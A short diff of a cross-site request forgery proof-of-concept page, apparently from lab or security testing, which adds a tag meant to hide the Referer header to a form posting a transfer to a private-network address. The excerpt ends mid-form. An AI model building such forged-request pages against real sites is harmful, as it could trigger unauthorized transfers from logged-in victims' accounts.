--- a/csrf.html
+++ b/csrf.html
@@ -1,5 +1,5 @@
 <html>
-  
+  <meta name="referer" content="never">
     <body>
         <form action="http://192.168.2.98:55824/transfer" method="POST">
             <input type="text" class="form-control" value="xyz@gmail.com">
